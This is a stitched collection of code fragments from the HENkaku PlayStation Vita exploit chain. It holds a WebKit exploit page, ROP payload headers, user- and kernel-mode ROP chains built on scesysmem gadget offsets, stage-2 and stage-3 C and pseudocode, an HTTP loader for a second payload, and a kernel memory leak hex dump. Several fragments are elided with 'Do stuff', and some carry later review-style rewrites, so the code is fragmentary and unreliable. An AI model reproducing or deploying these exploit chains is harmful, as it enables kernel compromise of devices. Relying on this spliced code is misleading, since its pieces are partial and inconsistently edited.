henkaku_index.html
<script src='payload.js'></script> | |
<script> | |
var r, a, e, t, n, o, l, i, f, v, s, c; | |
var u, y, w, p, d, g, h, k, b; | |
var A, U; | |
var m = 0x40 + payload[16/4]; /* 0x40 bytes for ROP header + 1840 bytes for stack*/ | |
m /= 4; /* 476 */ | |
henkaku_payload_bin.txt
[HEADER] (0x40 bytes) | |
0x524f507e -> ROP~ | |
0x01000100 -> Version | |
0x00000000 -> NULL | |
0x00000000 -> NULL | |
0x00000730 -> No reloc | |
0x00000000 -> NULL | |
0x00000000 -> NULL | |
0x00000000 -> NULL | |
0x000003F8 -> No reloc |
henkaku_stage3_krop.txt
// Kernel ROP chain | |
/* | |
scesysmem_base + 0x00000347 | |
POP {PC} | |
*/ | |
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031 // PC | |
/* | |
scesysmem_base + 0x00000031 | |
POP {R0,PC} |
henkaku_stage2.c
// Fixed-offset writes into the x_stack buffer (x_stack is declared outside this run).
// Copy SD card device path and param; sizeof on the literal includes the terminating NUL,
// so each memcpy writes exactly what strcpy would.
memcpy(x_stack + 0x000086B4, "sdstor0:", sizeof "sdstor0:");
memcpy(x_stack + 0x000086CC, "xmc-lp-ign-userext", sizeof "xmc-lp-ign-userext");
// Clear devctl 0x05 outbuf: 0x400 bytes, i.e. x_stack + 0x00006F34 .. x_stack + 0x00007334
memset(x_stack + 0x00006F34, 0, 0x400);
// Copy dummy device path
memcpy(x_stack + 0x000086E4, "molecule0:", sizeof "molecule0:");
henkaku_stage2_partial.c
strcpy(stack_base + 0x000086B4, "sdstor0:"); | |
strcpy(stack_base + 0x000086CC, "xmc-lp-ign-userext"); | |
// Do stuff | |
... | |
strcpy(stack_base + 0x000086E4, "molecule0:"); | |
SceLibKernel_a4ad("molecule0:"); | |
SceLibKernel_a55d("sdstor0:", 0x00000005, "xmc-lp-ign-userext", 0x00000014); |
henkaku_http_loader.c
// Do stuff | |
... | |
// Create a new thread for the second payload | |
int thread_id = sceKernelCreateThread("st2", SceWebkit_base + 0x000054C8, 0x10000100, 0x00600000, 0x00000000, 0x00000000, 0x00000000); | |
// Do stuff | |
... | |
// Construct the arguments for fetching the second payload |
henkaku_stage3_pseudocode.c
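// Allocate a new memory block
char *memblock_name = "Magic";
uint32_t memblock_type = 0x1020D006;
uint32_t memblock_size = 0xA0000;
void *memblock_opts = 0x00000000; /* integer constant 0: a null pointer constant */
uint32_t memblock_id = kern_memblock_alloc(memblock_name, memblock_type, memblock_size, memblock_opts, 0);
// Retrieve the memory block's address into a buffer.
// The callee writes through out_buf, so it must point at valid storage before
// the call: the previous version left out_buf uninitialized, which makes the
// write land at an indeterminate address. Back it with a local and keep
// out_buf as a uint32_t* so any later *out_buf use still works.
uint32_t memblock_addr_buf = 0;
uint32_t *out_buf = &memblock_addr_buf;
kern_memblock_getaddr(memblock_id, out_buf);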
henkaku_stage3_kxloader.c
// Entry point | |
sub_00000010(scesysmem_base, payload_addr) | |
{ | |
r4 = scesysmem_base | |
sub_00000356(); | |
r5 = scesysmem_base >> 0x20 | |
sub_0000035A(); | |
// Decrypt and launch HENkaku's payload |
henkaku_stage2_rop.txt
0x00(x_stack + 0x00008A8C) = scesysmem_base + 0x00000031 | |
0x00(x_stack + 0x00008A90) = 0x08106803 | |
0x00(x_stack + 0x00008A94) = scesysmem_base + 0x0001EFF1 | |
0x00(x_stack + 0x00008A98) = 0x00000038 | |
0x00(x_stack + 0x00008A9C) = scesysmem_base + 0x0001EFE1 | |
0x00(x_stack + 0x00008AA0) = scesysmem_base + 0x00000347 | |
0x00(x_stack + 0x00008AA4) = scesysmem_base + 0x000039EB | |
0x00(x_stack + 0x00008AA8) = scesysmem_base + 0x0001B571 | |
0x00(x_stack + 0x00008AAC) = 0x00000000 | |
0x00(x_stack + 0x00008AB0) = scesysmem_base + 0x00001E43 |
sceIoDevctl_leak_1.50.txt
0x00000000: 00 02 20 9F 80 05 08 00 E0 59 00 00 97 11 49 00 | |
0x00000010: A8 05 30 00 80 05 08 00 00 00 00 00 09 50 49 00 | |
0x00000020: 00 C9 21 00 00 C9 21 00 C0 8B 21 00 80 A5 21 00 | |
0x00000030: C0 8B 21 00 80 A5 21 00 00 B2 20 00 C0 65 20 00 | |
0x00000040: 00 B2 20 00 C0 65 20 00 C0 65 20 00 C0 65 20 00 | |
0x00000050: C0 65 20 00 C0 65 20 00 C0 21 20 00 C0 65 20 00 | |
0x00000060: C0 21 20 00 C0 65 20 00 00 47 20 00 00 47 20 00 | |
0x00000070: 00 47 20 00 00 47 20 00 C0 95 20 00 00 47 20 00 | |
0x00000080: C0 95 20 00 00 47 20 00 40 0B 20 00 40 0B 20 00 | |
0x00000090: 40 0B 20 00 40 0B 20 00 40 31 20 00 40 0B 20 00 |